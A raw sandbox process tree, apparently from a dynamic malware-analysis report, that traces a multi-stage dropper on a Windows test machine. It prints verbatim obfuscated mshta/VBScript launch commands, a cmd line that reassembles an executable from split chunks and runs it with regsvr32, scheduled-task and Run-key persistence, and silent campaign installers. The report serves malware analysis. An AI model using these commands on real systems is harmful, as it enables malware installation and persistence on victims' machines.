                                                                                                                                                                                            "C:\Windows\System32\mshta.exe" VbsCrIPT: cLOse ( CreaTEOBjeCt ( "WsCRiPT.sHelL" ). RUn ( "C:\Windows\system32\cmd.exe /Q /c tYpe ""C:\Users\Admin\AppData\Local\Temp\seV03VBOUIE.eXe"" > seV03VBOUIE.eXe&& StArt sev03VbOUie.exe -POVwq7z4ndmK6x4P & if ""-POVwq7z4ndmK6x4P "" == """" for %N In (""C:\Users\Admin\AppData\Local\Temp\seV03VBOUIE.eXe"" ) do taskkill -IM ""%~nxN"" /F" , 0 , TrUE ) )
                                                                                                                                                                                            11⤵
                                                                                                                                                                                              PID:1504
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                "C:\Windows\system32\cmd.exe" /Q /c tYpe "C:\Users\Admin\AppData\Local\Temp\seV03VBOUIE.eXe" > seV03VBOUIE.eXe&& StArt sev03VbOUie.exe -POVwq7z4ndmK6x4P & if "-POVwq7z4ndmK6x4P " == "" for %N In ("C:\Users\Admin\AppData\Local\Temp\seV03VBOUIE.eXe" ) do taskkill -IM "%~nxN" /F
                                                                                                                                                                                                12⤵
                                                                                                                                                                                                  PID:5464
                                                                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                "C:\Windows\System32\mshta.exe" vBScrIPt: closE (CreAteObjECt ( "wsCRIPT.sheLl" ). rUn ( "Cmd /R EcHo | Set /P = ""MZ"" > i61_m6.3i &cOPY /B /Y I61_M6.3I + XvVu.W4A+ Z9NNU.Z + W~cD4C.x + g3Fv7XCY.TZG + 4D8yN3.MnJ FMHAm.5Hv & stArT regsvr32 -s FMHAM.5hV " , 0 , TRuE ) )
                                                                                                                                                                                                11⤵
                                                                                                                                                                                                  PID:1816
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /R EcHo | Set /P = "MZ" > i61_m6.3i &cOPY /B /Y I61_M6.3I + XvVu.W4A+ Z9NNU.Z + W~cD4C.x + g3Fv7XCY.TZG + 4D8yN3.MnJ FMHAm.5Hv & stArT regsvr32 -s FMHAM.5hV
                                                                                                                                                                                                    12⤵
                                                                                                                                                                                                      PID:4720
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" EcHo "
                                                                                                                                                                                                        13⤵
                                                                                                                                                                                                          PID:1548
                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>i61_m6.3i"
                                                                                                                                                                                                          13⤵
                                                                                                                                                                                                            PID:720
                                                                                                                                                                                                          • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                            regsvr32 -s FMHAM.5hV
                                                                                                                                                                                                            13⤵
                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                            PID:3400
                                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                      taskkill -IM "3009686.exe" /F
                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                      PID:6616
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c Sun03ea09aa5c9686e5.exe
                                                                                                                                                                                            5⤵
                                                                                                                                                                                              PID:3100
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c Sun038db98f99bf9a.exe
                                                                                                                                                                                              5⤵
                                                                                                                                                                                                PID:2856
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS8A5BC2A3\Sun038db98f99bf9a.exe
                                                                                                                                                                                                  Sun038db98f99bf9a.exe
                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                  PID:3088
                                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\y7DLsK8JzEfVPXBoAxixfcAY.exe
                                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\y7DLsK8JzEfVPXBoAxixfcAY.exe"
                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    PID:4340
                                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\YC7lV7ybsOoVcoWfaiMt0tQZ.exe
                                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\YC7lV7ybsOoVcoWfaiMt0tQZ.exe"
                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                                                    PID:5136
                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                      schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                      PID:1620
                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                      schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                      PID:6232
                                                                                                                                                                                                    • C:\Users\Admin\Documents\FgguE7qT6E0r1SXEtJboJY9V.exe
                                                                                                                                                                                                      "C:\Users\Admin\Documents\FgguE7qT6E0r1SXEtJboJY9V.exe"
                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                        PID:6668
                                                                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\qT6ZBsyeM67D1cAzYqcc8ZnE.exe
                                                                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\qT6ZBsyeM67D1cAzYqcc8ZnE.exe"
                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                            PID:5188
                                                                                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\yCQQKWPj1MNkgCvIHQfdbirb.exe
                                                                                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\yCQQKWPj1MNkgCvIHQfdbirb.exe"
                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                              PID:6648
                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 6648 -s 236
                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                                                                PID:6332
                                                                                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\azz31zByp3ZuPfbVL8a6OGff.exe
                                                                                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\azz31zByp3ZuPfbVL8a6OGff.exe"
                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                              PID:4904
                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4904 -s 240
                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                PID:4356
                                                                                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\W2SfrUCOce0gmSzTA8nOXMcT.exe
                                                                                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\W2SfrUCOce0gmSzTA8nOXMcT.exe"
                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                PID:6724
                                                                                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\f_4fB2xOzQ0WOhf7TM09dKNO.exe
                                                                                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\f_4fB2xOzQ0WOhf7TM09dKNO.exe"
                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                  PID:6756
                                                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\mf4Q6YPKmXku_63GQGLz8sTk.exe
                                                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\mf4Q6YPKmXku_63GQGLz8sTk.exe"
                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                    PID:6616
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-KRA72.tmp\mf4Q6YPKmXku_63GQGLz8sTk.tmp
                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-KRA72.tmp\mf4Q6YPKmXku_63GQGLz8sTk.tmp" /SL5="$40374,506127,422400,C:\Users\Admin\Pictures\Adobe Films\mf4Q6YPKmXku_63GQGLz8sTk.exe"
                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                      PID:5040
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-LL6FM.tmp\ShareFolder.exe
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-LL6FM.tmp\ShareFolder.exe" /S /UID=2709
                                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                                        • Drops file in Drivers directory
                                                                                                                                                                                                                        • Adds Run key to start application
                                                                                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                                                                                        PID:5808
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\DIZIGHDEWT\foldershare.exe
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\DIZIGHDEWT\foldershare.exe" /VERYSILENT
                                                                                                                                                                                                                          12⤵
                                                                                                                                                                                                                            PID:4908
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\5a-b5869-c1e-97b85-8200c767cba3e\Jefybyfasa.exe
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\5a-b5869-c1e-97b85-8200c767cba3e\Jefybyfasa.exe"
                                                                                                                                                                                                                            12⤵
                                                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                                                            PID:5076
                                                                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                                                                                                                                                                                                                              13⤵
                                                                                                                                                                                                                                PID:7372
                                                                                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff86f1146f8,0x7ff86f114708,0x7ff86f114718
                                                                                                                                                                                                                                  14⤵
                                                                                                                                                                                                                                    PID:7596
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\ea-89d93-9d1-ae986-33653505bd726\Febopegeshu.exe
                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\ea-89d93-9d1-ae986-33653505bd726\Febopegeshu.exe"
                                                                                                                                                                                                                                12⤵
                                                                                                                                                                                                                                  PID:5540
                                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\asmkmnda.1g4\GcleanerEU.exe /eufive & exit
                                                                                                                                                                                                                                    13⤵
                                                                                                                                                                                                                                      PID:7224
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\asmkmnda.1g4\GcleanerEU.exe
                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\asmkmnda.1g4\GcleanerEU.exe /eufive
                                                                                                                                                                                                                                        14⤵
                                                                                                                                                                                                                                          PID:8488
                                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dtop5x4n.4ah\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                                                                        13⤵
                                                                                                                                                                                                                                          PID:7860
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\dtop5x4n.4ah\installer.exe
                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\dtop5x4n.4ah\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                                                                                            14⤵
                                                                                                                                                                                                                                              PID:8108
                                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3cjmor33.0i1\any.exe & exit
                                                                                                                                                                                                                                            13⤵
                                                                                                                                                                                                                                              PID:8296
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\3cjmor33.0i1\any.exe
                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\3cjmor33.0i1\any.exe
                                                                                                                                                                                                                                                14⤵
                                                                                                                                                                                                                                                  PID:8952
                                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\owusjflz.2ku\gcleaner.exe /mixfive & exit
                                                                                                                                                                                                                                                13⤵
                                                                                                                                                                                                                                                  PID:8472
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\owusjflz.2ku\gcleaner.exe
                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\owusjflz.2ku\gcleaner.exe /mixfive
                                                                                                                                                                                                                                                    14⤵
                                                                                                                                                                                                                                                      PID:9036
                                                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hvtd4ad3.prx\autosubplayer.exe /S & exit
                                                                                                                                                                                                                                                    13⤵
                                                                                                                                                                                                                                                      PID:8936
                                                                                                                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\Omfp7DwTDG5TseZGszRDVDvw.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\Omfp7DwTDG5TseZGszRDVDvw.exe"
                                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                                                PID:6096
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-ILVUM.tmp\Omfp7DwTDG5TseZGszRDVDvw.tmp
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-ILVUM.tmp\Omfp7DwTDG5TseZGszRDVDvw.tmp" /SL5="$A021C,506127,422400,C:\Users\Admin\Pictures\Adobe Films\Omfp7DwTDG5TseZGszRDVDvw.exe"
                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                  PID:3584
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-RA9HP.tmp\ShareFolder.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-RA9HP.tmp\ShareFolder.exe" /S /UID=2710
                                                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                                                    • Drops file in Drivers directory
                                                                                                                                                                                                                                                    PID:256
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\0f-7da5c-63d-7cca2-dfddc16a89b07\Hyhizhaevojo.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\0f-7da5c-63d-7cca2-dfddc16a89b07\Hyhizhaevojo.exe"
                                                                                                                                                                                                                                                      12⤵
                                                                                                                                                                                                                                                        PID:852
                                                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mmlth1zq.sux\GcleanerEU.exe /eufive & exit
                                                                                                                                                                                                                                                          13⤵
                                                                                                                                                                                                                                                            PID:7188
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\mmlth1zq.sux\GcleanerEU.exe
                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\mmlth1zq.sux\GcleanerEU.exe /eufive
                                                                                                                                                                                                                                                              14⤵
                                                                                                                                                                                                                                                                PID:8672
                                                                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cyhlh5ow.zxi\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                                                                                              13⤵
                                                                                                                                                                                                                                                                PID:8168
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\cyhlh5ow.zxi\installer.exe
                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\cyhlh5ow.zxi\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                                                                                                                  14⤵
                                                                                                                                                                                                                                                                    PID:8500
                                                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\n4ul1fqz.vpc\any.exe & exit
                                                                                                                                                                                                                                                                  13⤵
                                                                                                                                                                                                                                                                    PID:8580
                                                                                                                                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\hyV7MUyGN1vp5LF_Y0M4SUst.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\hyV7MUyGN1vp5LF_Y0M4SUst.exe"
                                                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                                                              PID:6832
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\hyV7MUyGN1vp5LF_Y0M4SUst.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\hyV7MUyGN1vp5LF_Y0M4SUst.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                  PID:1364
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\hyV7MUyGN1vp5LF_Y0M4SUst.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\hyV7MUyGN1vp5LF_Y0M4SUst.exe" ) do taskkill -f -iM "%~NxM"
                                                                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                                                                      PID:232
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                        taskkill -f -iM "hyV7MUyGN1vp5LF_Y0M4SUst.exe"
                                                                                                                                                                                                                                                                        12⤵
                                                                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                                                                        PID:2240
                                                                                                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\M7OFzUVU_2lUEUpKKqmfcm9Q.exe
                                                                                                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\M7OFzUVU_2lUEUpKKqmfcm9Q.exe"
                                                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                  PID:6808
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                                    PID:5320
                                                                                                                                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\jpVBXoWtez9zBh5IgkIjaced.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\jpVBXoWtez9zBh5IgkIjaced.exe"
                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                              PID:5124
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5124 -s 236
                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                                PID:1452
                                                                                                                                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\WLbIvLor5WnQKm5knvi8MtWz.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\WLbIvLor5WnQKm5knvi8MtWz.exe"
                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                              PID:3688
                                                                                                                                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\BePq_T9Hq3iVMTpXRgK27vyP.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\BePq_T9Hq3iVMTpXRgK27vyP.exe"
                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                              PID:5276
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5276 -s 236
                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                                                                                                                PID:1488
                                                                                                                                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\xh3mZK2ecejG8igusCC8zBL1.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\xh3mZK2ecejG8igusCC8zBL1.exe"
                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                              PID:5408
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5408 -s 240
                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                                                                                                                PID:4464
                                                                                                                                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\gGwOY5NCLlCu9C5g3_VvcyON.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\gGwOY5NCLlCu9C5g3_VvcyON.exe"
                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                              PID:5904
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c Sun0324aba28588c0.exe
                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                            PID:2084
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS8A5BC2A3\Sun0324aba28588c0.exe
                                                                                                                                                                                                                                                              Sun0324aba28588c0.exe
                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                              PID:3316
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 3316 -s 240
                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                                                                                                                PID:7076
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\autochk.exe
                                                                                                                                                                                                                                                      "C:\Windows\SysWOW64\autochk.exe"
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                        PID:3400
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WWAHost.exe
                                                                                                                                                                                                                                                        "C:\Windows\SysWOW64\WWAHost.exe"
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                        • Adds Run key to start application
                                                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                                                                                                                        • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                        PID:2796
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          /c del "C:\Users\Admin\Pictures\Adobe Films\Rk5Q2GiLAWwnXHDIUz01H0AG.exe"
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                            PID:6744
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\colorcpl.exe
                                                                                                                                                                                                                                                          "C:\Windows\SysWOW64\colorcpl.exe"
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                            PID:3304
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\899E.exe
                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\899E.exe
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                            PID:5272
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\899E.exe
                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\899E.exe
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                              PID:6092
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\D0CA.exe
                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\D0CA.exe
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                              PID:1580
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\DA41.exe
                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\DA41.exe
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                PID:2216
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2216 -s 276
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                                                                                                                                  PID:5684
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\9E7C.exe
                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\9E7C.exe
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                PID:1568
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\BF63.exe
                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\BF63.exe
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                  PID:572
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\DABC.exe
                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\DABC.exe
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                    PID:6108
                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Nanxd0\etj8l08paz78.exe
